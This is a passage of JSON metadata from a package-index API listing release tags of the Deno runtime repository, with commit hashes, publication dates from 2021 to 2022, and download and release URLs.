pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_